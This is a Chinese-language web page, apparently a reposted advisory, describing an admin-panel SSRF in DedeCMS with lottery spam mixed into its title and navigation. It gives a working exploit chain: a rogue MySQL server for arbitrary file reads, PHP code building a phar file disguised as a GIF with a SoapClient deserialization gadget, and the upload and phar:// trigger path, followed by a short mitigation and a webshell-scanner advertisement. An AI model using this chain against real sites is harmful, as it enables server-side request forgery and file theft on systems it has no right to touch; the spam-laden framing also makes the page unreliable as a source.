代理加盟 2019全新代理計劃 賺錢+省錢雙管齊下,獨立平臺,豐厚利潤!

您現在的位置: 大乐透复式20加8多少钱 > 織夢大學 > 織夢安全 >

3d组六复式投注计划表:DedeCMS 后臺存在SSRF漏洞

來源:未知 發布時間:2019-09-27熱度: ℃我要評論
dedecms的后臺存在ucenter功能,可以直接修改ucenter的配置,使網站的mysql連接。指向我們預先構造的rogue mysql server https://github.com/Gifts/Rogue-MySql-Server.git 設置之后我們就可以通過修改惡意服務端的設置來讀取任意文件。 假如讀取的文件路徑是以phar協...

大乐透复式20加8多少钱 www.wmmqog.com.cn 織夢模板免費下載,無需注冊無需充值

dedecms的后臺存在ucenter功能,可以直接修改ucenter的配置,使網站的mysql連接。指向我們預先構造的rogue mysql server https://github.com/Gifts/Rogue-MySql-Server.git

設置之后我們就可以通過修改惡意服務端的設置來讀取任意文件。 假如讀取的文件路徑是以phar協議開頭的,那么讀取的文件內容就會被反序列化。 根據dedecms的代碼,我們可以利用soapclient內置類來構造反序列化pop鏈來ssrf。

<?php

class Control

{

    var $tpl;

    public $dsql;

    function __construct(){

                $this->dsql = new SoapClient(null,array('uri'=>'//test:5555', 'location'=>'//test:5555/aaa'));

        }

}

@unlink("dedecms.phar");

$phar = new Phar("dedecms.phar");

$phar->startBuffering();

$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");

$o = new Control();

$phar->setMetadata($o); 

$phar->addFromString("test.txt", "test");

$phar->stopBuffering();

?>

 
將生成的文件修改為dedecms.png,然后在dedecms上有很多地方都可以上傳。
 
上傳成功之后可以從文件列表中獲取到圖片鏈接。
 
phar://../uploads/allimg/190724/1_1529564891.png/test.txt
 
設置完成之后,刷新就可以觸發ssrf。
 

解決方案:

臨時解決方案

通過mysqli_options設置鏈接時禁用allow_local_infile配置可阻止該漏洞。

或在php.ini中改配置為mysqli.allow_local_infile = Off

推薦D盾—WEB查看工具:

軟件使用自行研發不分擴展名的代碼分析引擎,能分析更為隱藏的WebShell后門行為。

引擎特別針對,一句話后門,變量函數后門,${}執行 ,`執行,

preg_replace執行,call_user_func,file_put_contents,fputs 等特殊函數

的參數進行針對性的識別,能查殺更為隱藏的后門,

并把可疑的參數信息展現在你面前,讓你能更快速的了解后門的情況

新版特別針對 dedecms 的{dede:php}{/dede:php}代碼加入了識別!

軟件加入隔離功能,并且可以還原!

如有不能識別的webshell請使用上傳樣本功能上傳給我們,我們將后期加入識別!

下載://www.d99net.net/down/WebShellKill_V1.4.1.zip

D盾查殺工具

本文地址://www.wmmqog.com.cn/dedecms_aq/1764.html

    上一篇:dedecms SQL注入漏洞 member/album_add.php 修復

    下一篇:沒有了

    發表評論

    評論列表(條)